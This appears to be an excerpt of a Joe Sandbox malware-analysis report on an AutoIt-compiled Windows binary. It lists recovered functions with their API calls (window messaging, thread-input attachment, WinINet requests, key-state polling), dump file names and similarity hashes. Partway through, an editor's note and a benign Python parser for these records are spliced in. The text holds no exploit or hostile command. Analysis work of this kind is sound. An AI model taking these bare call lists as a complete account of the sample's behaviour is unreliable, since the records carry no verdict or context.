                                                                                                                                                                                                                                          • String ID: 0$F
                                                                                                                                                                                                                                          • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                          • Opcode ID: 83fc75322c5b2cc94364a85f691870a63a6aedcfcdc2767815cf820e91839c3e
                                                                                                                                                                                                                                          • Instruction ID: 4b58055617b10946425f2e8c61424cbc26a3435917172c960074468d14c49ade
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83fc75322c5b2cc94364a85f691870a63a6aedcfcdc2767815cf820e91839c3e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D415879A01209EFDB14DFA4DC84AEA7BB5FF49350F140029F956A7360D770AA20CF94
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                            • Part of subcall function 00133CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00133CCA
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00131F64
                                                                                                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 00131F6F
                                                                                                                                                                                                                                          • GetParent.USER32 ref: 00131F8B
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00131F8E
                                                                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00131F97
                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00131FAB
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00131FAE
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                          • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                          • Opcode ID: 7f140e94ea71b533800e0f534b39abc1b89677fb34c3a3068b3e46575f740b75
                                                                                                                                                                                                                                          • Instruction ID: 334abdf8e27d3e341b069b2ee0a9289f56014a2c888d6e3a6d342f7523683af3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f140e94ea71b533800e0f534b39abc1b89677fb34c3a3068b3e46575f740b75
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C21BE74A00214BBCF05AFA0DC859FEBBB9AF15350F004116F9A1A72A1CB7459499BA4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

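The function records in this part of the report share one fixed layout: an "APIs" list of resolved calls (with optional "Part of subcall function" attribution), the memory-dump source, and a "Similarity" block of API/String/Opcode identifiers and fuzzy hashes that Joe Sandbox uses to match functions across samples. Triage and clustering work is much easier once those records are machine-readable, so the following Python parser is added here as an example; it is not Joe Sandbox code, and its record and field names (`FunctionRecord`, `api_set`, `string_ids`) are this editor's own. The sample text embedded in it is copied from two of the records above.

```python
import re
from dataclasses import dataclass, field

# One resolved call line, e.g.
#   • SetErrorMode.KERNEL32(00000000,READY), ref: 001454A7
#   • GetLastError.KERNEL32 ref: 00145420
#   • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
                   "Similarity", "Uniqueness"}


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)      # calls made directly by the function
    subcalls: list = field(default_factory=list)  # calls attributed to a callee ("Part of subcall")
    fields: dict = field(default_factory=dict)    # "API ID", "Opcode Fuzzy Hash", ... -> value


def _call(m):
    args = m["args"]
    return {
        "name": m["name"],
        "module": m["module"],
        "args": [a.strip() for a in args.split(",")] if args else [],
        "ref": m["ref"],
        "caller": m["sub"],  # hex address of the subcall function, or None
    }


def parse_records(text):
    """Split report text into FunctionRecords; each record starts at an 'APIs' header."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            section = "apis"
            continue
        if current is None:          # tail of a record that began before this text
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if line.startswith("Uniqueness Score:"):
            current.fields["Uniqueness Score"] = line.split(":", 1)[1].strip()
            continue
        if not line.startswith("•"):
            continue
        m = API_LINE.match(line)
        if m and section == "apis":
            (current.subcalls if m["sub"] else current.apis).append(_call(m))
            continue
        key, _, value = line[1:].partition(":")
        key, value = key.strip(), value.strip()
        if key == "Associated":      # repeated line; strip the web page's "Download File" link text
            current.fields.setdefault("Associated", []).append(
                value.replace("Download File", "").strip())
        else:
            current.fields[key] = value
    return records


def api_set(rec):
    """Unordered 'Name.MODULE' set of the function's direct calls, for quick comparison."""
    return {f"{c['name']}.{c['module']}" for c in rec.apis}


def string_ids(rec):
    """The '$'-joined String ID field as a list."""
    return [s for s in rec.fields.get("String ID", "").split("$") if s]


# Constructed sample: two records copied from the report section above.
SAMPLE = """
APIs
• SetErrorMode.KERNEL32(00000001), ref: 001453A0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00145416
• GetLastError.KERNEL32 ref: 00145420
• SetErrorMode.KERNEL32(00000000,READY), ref: 001454A7
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Instruction Fuzzy Hash: 87319235A00604DFCB14DF68C984AAA7BB5EF55345F188065E805DF3A3EB71DD86CBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
• Part of subcall function 00133CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00133CCA
• SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00131F64
• GetDlgCtrlID.USER32 ref: 00131F6F
• GetParent.USER32 ref: 00131F8B
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
"""

if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(sorted(api_set(r)), string_ids(r), r.fields.get("Instruction Fuzzy Hash"))
```

Feeding a whole report's execution-graph section through `parse_records` gives one record per recovered function; comparing `api_set` and `string_ids` across samples, or grouping on the `API String ID` field, is a cheap first pass before looking at the fuzzy hashes.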
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00163A9D
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00163AA0
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00163AC7
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00163AEA
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00163B62
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00163BAC
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00163BC7
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00163BE2
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00163BF6
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00163C13
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetCurrentThreadId.KERNEL32 ref: 0013B151
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,0013A1E1,?,00000001), ref: 0013B165
• GetWindowThreadProcessId.USER32(00000000), ref: 0013B16C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0013A1E1,?,00000001), ref: 0013B17B
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0013B18D
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0013A1E1,?,00000001), ref: 0013B1A6
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0013A1E1,?,00000001), ref: 0013B1B8
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0013A1E1,?,00000001), ref: 0013B1FD
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0013A1E1,?,00000001), ref: 0013B212
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0013A1E1,?,00000001), ref: 0013B21D
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 00102C94
  • Part of subcall function 001029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000), ref: 001029DE
  • Part of subcall function 001029C8: GetLastError.KERNEL32(00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000,00000000), ref: 001029F0
• _free.LIBCMT ref: 00102CA0
• _free.LIBCMT ref: 00102CAB
• _free.LIBCMT ref: 00102CB6
• _free.LIBCMT ref: 00102CC1
• _free.LIBCMT ref: 00102CCC
• _free.LIBCMT ref: 00102CD7
• _free.LIBCMT ref: 00102CE2
• _free.LIBCMT ref: 00102CED
• _free.LIBCMT ref: 00102CFB
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00147FAD
• SetCurrentDirectoryW.KERNEL32(?), ref: 00147FC1
• GetFileAttributesW.KERNEL32(?), ref: 00147FEB
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00148005
• SetCurrentDirectoryW.KERNEL32(?), ref: 00148017
• SetCurrentDirectoryW.KERNEL32(?), ref: 00148060
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001480B0
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile
• String ID: *.*
• API String ID: 769691225-438819550
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 000D5C7A
                                                                                                                                                                                                                                            • Part of subcall function 000D5D0A: GetClientRect.USER32(?,?), ref: 000D5D30
                                                                                                                                                                                                                                            • Part of subcall function 000D5D0A: GetWindowRect.USER32(?,?), ref: 000D5D71
                                                                                                                                                                                                                                            • Part of subcall function 000D5D0A: ScreenToClient.USER32(?,?), ref: 000D5D99
                                                                                                                                                                                                                                          • GetDC.USER32 ref: 001146F5
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00114708
                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00114716
                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0011472B
                                                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00114733
                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001147C4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                          • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                          • Opcode ID: 05ab1cbfc6b7a600550f47482fc9076bcbc4d910cbc2eb4d293cb8fb3dba81fa
                                                                                                                                                                                                                                          • Instruction ID: 0c7f3a24c6f9381f89f98c457b310a58a7d28f402639e4e53af84c203a590fa3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05ab1cbfc6b7a600550f47482fc9076bcbc4d910cbc2eb4d293cb8fb3dba81fa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B771CB31500205EFCF298F64CD84AFA3BB6FF4A766F14427AED555A2A6C3309881DF60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001435E4
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                          • LoadStringW.USER32(001A2390,?,00000FFF,?), ref: 0014360A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LoadString$_wcslen
                                                                                                                                                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                          • API String ID: 4099089115-2391861430
                                                                                                                                                                                                                                          • Opcode ID: 477bf130e2168ff52ce486fe1df4f97307b25728e1d0b84873511bf0e113e392
                                                                                                                                                                                                                                          • Instruction ID: 4bb920e58bfebb9250ee76a50710628740dcac2ca03af93c305c18f1cf5259a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 477bf130e2168ff52ce486fe1df4f97307b25728e1d0b84873511bf0e113e392
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D517F7190020ABBDF15EBE0DC42EEEBB78AF14350F144126F115722A2EB711B99DFA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
                                                                                                                                                                                                                                            • Part of subcall function 000E912D: GetCursorPos.USER32(?), ref: 000E9141
                                                                                                                                                                                                                                            • Part of subcall function 000E912D: ScreenToClient.USER32(00000000,?), ref: 000E915E
                                                                                                                                                                                                                                            • Part of subcall function 000E912D: GetAsyncKeyState.USER32(00000001), ref: 000E9183
                                                                                                                                                                                                                                            • Part of subcall function 000E912D: GetAsyncKeyState.USER32(00000002), ref: 000E919D
                                                                                                                                                                                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00168B6B
                                                                                                                                                                                                                                          • ImageList_EndDrag.COMCTL32 ref: 00168B71
                                                                                                                                                                                                                                          • ReleaseCapture.USER32 ref: 00168B77
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00168C12
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00168C25
                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00168CFF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                          • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                          • Opcode ID: 0562c578c750f6dd59fa6262a706637b2e7ffc07838dd572204ccf77d0c564e0
                                                                                                                                                                                                                                          • Instruction ID: 6efb2541af49bd79e924675921abebad0f9598641cde24b461c6cde1b01e418b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0562c578c750f6dd59fa6262a706637b2e7ffc07838dd572204ccf77d0c564e0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A516A74204300AFD704DF14DC56FAA77E4FB89714F400A2EF996A72E2DB709954CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0014C272
                                                                                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0014C29A
                                                                                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0014C2CA
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0014C322
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 0014C336
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0014C341
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00113AAF,?,?,Bad directive syntax error,0016CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 001398BC
• LoadStringW.USER32(00000000,?,00113AAF,?), ref: 001398C3
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00139987
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: HandleLoadMessageModuleString_wcslen
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 858772685-4153970271
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetParent.USER32 ref: 001320AB
• GetClassNameW.USER32(00000000,?,00000100), ref: 001320C0
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0013214D
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1290815626-3381328864
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: _free$EnvironmentVariable___from_strstr_to_strchr
• String ID:
• API String ID: 1282221369-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00126890
• ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001268A9
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001268B9
• ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001268D1
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001268F2
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000E8874,00000000,00000000,00000000,000000FF,00000000), ref: 00126901
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0012691E
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000E8874,00000000,00000000,00000000,000000FF,00000000), ref: 0012692D
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1268354404-0
                                                                                                                                                                                                                                          • Opcode ID: a07a96a501d8d3c9835ee688f0033398aafbe461a54aa38ea5de26e2aae90cbf
                                                                                                                                                                                                                                          • Instruction ID: b2f8aa83010e15223433260c9d4f3a19c98d0887f37a8f0e355e104efffa887c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a07a96a501d8d3c9835ee688f0033398aafbe461a54aa38ea5de26e2aae90cbf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98518970600309EFDB20CF25DC55BAA7BB5FB58754F108518F956A72E0DBB0E9A0DB50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0014C182
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0014C195
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 0014C1A9
                                                                                                                                                                                                                                            • Part of subcall function 0014C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0014C272
                                                                                                                                                                                                                                            • Part of subcall function 0014C253: GetLastError.KERNEL32 ref: 0014C322
                                                                                                                                                                                                                                            • Part of subcall function 0014C253: SetEvent.KERNEL32(?), ref: 0014C336
                                                                                                                                                                                                                                            • Part of subcall function 0014C253: InternetCloseHandle.WININET(00000000), ref: 0014C341
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
